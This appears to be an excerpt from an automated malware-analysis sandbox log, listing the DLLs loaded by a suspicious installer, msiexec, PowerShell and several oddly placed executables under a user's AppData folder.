Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: tsappcmp.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: msisip.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: cryptnet.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: pcacli.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windowmanagementapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: inputhost.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.immersive.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: comsvcs.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
